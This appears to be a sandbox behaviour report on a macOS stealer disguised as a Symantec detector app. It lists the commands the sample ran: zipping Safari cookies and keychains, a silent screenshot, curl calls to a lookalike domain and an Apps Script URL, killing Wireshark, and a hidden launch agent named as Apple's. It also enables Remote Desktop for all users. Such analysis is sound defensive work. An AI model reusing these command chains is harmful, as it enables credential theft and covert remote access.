Source: /usr/bin/perl5.18 (PID: 579)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uid
Source: /usr/bin/perl5.18 (PID: 580)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uid
Source: /usr/bin/perl5.18 (PID: 581)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uid
Source: /usr/bin/perl5.18 (PID: 582)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uid
Source: /usr/bin/perl5.18 (PID: 583)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uid
Source: /usr/bin/perl5.18 (PID: 584)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uid
Source: /usr/bin/perl5.18 (PID: 585)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uid
Source: /usr/bin/perl5.18 (PID: 586)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uid
Source: /usr/bin/perl5.18 (PID: 587)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uid
Source: /usr/bin/perl5.18 (PID: 588)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uid
Source: /usr/bin/perl5.18 (PID: 589)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uid
Source: /usr/bin/perl5.18 (PID: 590)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uid
Source: /usr/bin/perl5.18 (PID: 591)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uid
Source: /usr/bin/perl5.18 (PID: 592)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uid
Source: /usr/bin/perl5.18 (PID: 593)	Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uid

Executes the "chmod" command used to modify permissions

Show sources

Source: /usr/bin/sudo (PID: 540)	Chmod executable: /bin/chmod -> chmod -R 777 /Library/.cachedir /Library/.random
Source: /usr/bin/sudo (PID: 548)	Chmod executable: /bin/chmod -> chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist

Executes the "curl" command used to transfer data via the network (usually using HTTP/S)

Show sources

Source: /bin/sh (PID: 513)	Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)	Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa

Executes the "dscl" in order to retrieve a list of existing users and/or other user information

Show sources

Source: /bin/sh (PID: 553)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)	Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid

Executes the "mkdir" command used to create folders

Show sources

Source: /bin/sh (PID: 481)	Mkdir executable: /bin/mkdir -> mkdir /tmp/.dio3we
Source: /usr/bin/sudo (PID: 538)	Mkdir executable: /bin/mkdir -> mkdir -p /Library/.cachedir /Library/.random

Executes the "ping" command used for connectivity testing via ICMP

Show sources

Source: /bin/sh (PID: 518)	Ping executable: /sbin/ping -> ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)	Ping executable: /sbin/ping -> ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)	Ping executable: /sbin/ping -> ping -c 1 symeher.co
Source: /bin/sh (PID: 524)	Ping executable: /sbin/ping -> ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)	Ping executable: /sbin/ping -> ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)	Ping executable: /sbin/ping -> ping -c 1 abrahamlincolnisaliveandrunssymantec.com

Executes the "route" command used read or manipulate the routing tables

Show sources

Source: /bin/sh (PID: 479)

Route executable: /sbin/route -> route -n get default

Opens applications that may be created ones

Show sources

Source: /bin/sh (PID: 504)

Application opened: open /tmp/xpc.app

Reads launchservices plist files

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Reads user launchservices plist file containing default apps for corresponding filetypes

Show sources

Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)	Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)	Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

Writes 64-bit Mach-O files to disk

Show sources

Source: /usr/bin/unzip (PID: 502)	File written: /private/tmp/xpc.app/Contents/MacOS/xpc
Source: /bin/cp (PID: 541)	File written: /Library/.random/xpcd.app/Contents/MacOS/xpc

Writes Mach-O files to the tmp directory

Show sources

Source: /usr/bin/unzip (PID: 502)

64-bit Mach-O written to tmp path: /private/tmp/xpc.app/Contents/MacOS/xpc

Writes Python files to disk

Show sources

Source: /usr/bin/unzip (PID: 502)	Python file created: /private/tmp/xpc.app/Contents/Resources/cb.py
Source: /usr/bin/unzip (PID: 502)	Python file created: /private/tmp/xpc.app/Contents/Resources/ch.py
Source: /usr/bin/unzip (PID: 502)	Python file created: /private/tmp/xpc.app/Contents/Resources/pbkdf2.py
Source: /usr/bin/unzip (PID: 502)	Python file created: /private/tmp/xpc.app/Contents/Resources/pyDes.py
Source: /usr/bin/unzip (PID: 502)	Python file created: /private/tmp/xpc.app/Contents/Resources/Schema.py
Source: /bin/cp (PID: 541)	Python file created: /Library/.random/xpcd.app/Contents/Resources/cb.py
Source: /bin/cp (PID: 541)	Python file created: /Library/.random/xpcd.app/Contents/Resources/ch.py
Source: /bin/cp (PID: 541)	Python file created: /Library/.random/xpcd.app/Contents/Resources/pbkdf2.py
Source: /bin/cp (PID: 541)	Python file created: /Library/.random/xpcd.app/Contents/Resources/pyDes.py
Source: /bin/cp (PID: 541)	Python file created: /Library/.random/xpcd.app/Contents/Resources/Schema.py

Writes ZIP files to disk

Show sources

Source: /usr/bin/zip (PID: 485)	ZIP file created: /private/tmp/.dio3we/ziRJb6aY
Source: /usr/bin/zip (PID: 487)	ZIP file created: /private/tmp/.dio3we/ziPHlHPH

Writes icon files to disk

Show sources

Source: /usr/bin/unzip (PID: 502)	File written: /private/tmp/xpc.app/Contents/Resources/Finder.icns
Source: /bin/cp (PID: 541)	File written: /Library/.random/xpcd.app/Contents/Resources/Finder.icns

Executes the "rm" command used to delete files or directories

Show sources

Source: /bin/sh (PID: 483)	Rm executable: /bin/rm -> rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /usr/bin/xargs (PID: 492)	Rm executable: /bin/rm -> rm -- /tmp/.dio3we/KEYCHAINS.zip /tmp/.dio3we/SAFARI.zip
Source: /bin/sh (PID: 531)	Rm executable: /bin/rm -> rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 535)	Rm executable: /bin/rm -> rm -rf grace_period

Executes the "sudo" command used to execute a command as another user

Show sources

Source: /bin/sh (PID: 495)	Sudo executable: /usr/bin/sudo -> sudo -k
Source: /bin/sh (PID: 498)	Sudo executable: /usr/bin/sudo -> sudo -S echo success
Source: /bin/sh (PID: 537)	Sudo executable: /usr/bin/sudo -> sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)	Sudo executable: /usr/bin/sudo -> sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 543)	Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>
Source: /bin/sh (PID: 545)	Sudo executable: /usr/bin/sudo -> sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)	Sudo executable: /usr/bin/sudo -> sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)	Sudo executable: /usr/bin/sudo -> sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers

Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)

Show sources

Source: /bin/sh (PID: 479)	Shell process: route -n get default
Source: /bin/sh (PID: 480)	Shell process: awk /gateway/ { print $2 }
Source: /bin/sh (PID: 481)	Shell process: mkdir /tmp/.dio3we
Source: /bin/sh (PID: 482)	Shell process: cp /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 483)	Shell process: rm -rf /Users/vreni/Library/Safari/History.db.dump
Source: /bin/sh (PID: 485)	Shell process: zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Source: /bin/sh (PID: 487)	Shell process: zip -qr /tmp/.dio3we/KEYCHAINS.zip /Users/vreni/Library/Keychains /Library/Keychains
Source: /bin/sh (PID: 490)	Shell process: find /tmp/.dio3we -type f -not -name backup_(null).zip -print0
Source: /bin/sh (PID: 491)	Shell process: xargs -0 rm --
Source: /bin/sh (PID: 493)	Shell process: screencapture -x /tmp/.dio3we/.prelim.png
Source: /bin/sh (PID: 494)	Shell process: csrutil status
Source: /bin/sh (PID: 495)	Shell process: sudo -k
Source: /bin/sh (PID: 498)	Shell process: sudo -S echo success
Source: /bin/sh (PID: 502)	Shell process: unzip -d /tmp /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/Resources/sym03_2901.dat
Source: /bin/sh (PID: 503)	Shell process: xattr -c /tmp/xpc.app
Source: /bin/sh (PID: 504)	Shell process: open /tmp/xpc.app
Source: /bin/sh (PID: 507)	Shell process: openssl rsautl -verify -in /tmp/xpc.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 510)	Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 513)	Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 516)	Shell process: curl -s --connect-timeout 10 -o /tmp/au https://symantecheurengine.com/rsa
Source: /bin/sh (PID: 518)	Shell process: ping -c 1 symantecheurengine.com
Source: /bin/sh (PID: 520)	Shell process: ping -c 1 symheureng.com
Source: /bin/sh (PID: 522)	Shell process: ping -c 1 symeher.co
Source: /bin/sh (PID: 524)	Shell process: ping -c 1 kio2349329490jfdkf394.com
Source: /bin/sh (PID: 526)	Shell process: ping -c 1 klsadkla93242lokiloki.com
Source: /bin/sh (PID: 528)	Shell process: ping -c 1 abrahamlincolnisaliveandrunssymantec.com
Source: /bin/sh (PID: 530)	Shell process: cat /tmp/.sklerfde
Source: /bin/sh (PID: 531)	Shell process: rm -rf /tmp/.sklerfde
Source: /bin/sh (PID: 533)	Shell process: killall Console
Source: /bin/sh (PID: 534)	Shell process: killall Wireshark
Source: /bin/sh (PID: 535)	Shell process: rm -rf grace_period
Source: /bin/sh (PID: 537)	Shell process: sudo -S mkdir -p /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 539)	Shell process: sudo chmod -R 777 /Library/.cachedir /Library/.random
Source: /bin/sh (PID: 541)	Shell process: cp -R /tmp/xpc.app /Library/.random/xpcd.app
Source: /bin/sh (PID: 542)	Shell process: mv /Library/.random/xpcd.app/Contents/MacOS/xpc /Library/.random/xpcd.app/Contents/MacOS/xpcd
Source: /bin/sh (PID: 543)	Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>xpcd</string><key>CFBundleIdentifier</key><string>com.apple.xpcd</string><key>CFBundleInfoDictionaryVersion</key><string>2.0</string><key>CFBundleName</key><string>xpcd</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>2.0</string><key>CFBundleSignature</key><string>????</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>17</string><key>DTSDKName</key><string>macosx10.12internal</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>LSUIElement</key><true/><key>NSHumanReadableCopyright</key><string>Copyright 2017 wickedinfinity. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string>
Source: /bin/sh (PID: 545)	Shell process: sudo sh -c echo '<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE plist PUBLIC '-//Apple//DTD PLIST 1.0//EN' 'http://www.apple.com/DTDs/PropertyList-1.0.dtd'><plist version='1.0'><dict><key>KeepAlive</key><true/><key>Label</key><string>com.apple.xpcd</string><key>ProgramArguments</key><array><string>/Library/.random/xpcd.app/Contents/MacOS/xpcd</string></array><key>RunAtLoad</key><true/></dict></plist>' > /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 547)	Shell process: sudo chmod 644 /Library/LaunchAgents/com.apple.xpcd.plist
Source: /bin/sh (PID: 550)	Shell process: sudo -S /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -off -restart -agent -privs -all -allowAccessFor -allUsers
Source: /bin/sh (PID: 553)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 554)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 555)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 556)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 557)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 558)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 559)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 560)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 561)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 562)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 563)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 564)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 565)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 566)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 569)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 570)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 571)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 572)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 573)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 574)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 575)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 576)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 577)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 578)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 579)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 580)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 581)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 582)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 583)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 584)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 585)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 586)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 587)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 588)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 589)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 590)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 591)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 592)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 593)	Shell process: /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid

Reads local browser cookies

Show sources

Source: /usr/bin/zip (PID: 485)	Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies
Source: /usr/bin/zip (PID: 485)	Binary cookie file read: /Users/vreni/Library/Cookies/Cookies.binarycookies

Terminates several processes with shell command 'killall'

Show sources

Source: /bin/sh (PID: 533)	Killall command executed: killall Console
Source: /bin/sh (PID: 534)	Killall command executed: killall Wireshark

Boot Survival:

Creates memory-persistent launch services

Show sources

Source: /bin/sh (PID: 546)

Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Library/LaunchAgents/com.apple.xpcd.plist

Creates user-wide 'launchd' managed services aka launch agents

Show sources

Source: /bin/sh (PID: 546)

Launch agent created file created: /Library/LaunchAgents/com.apple.xpcd.plist

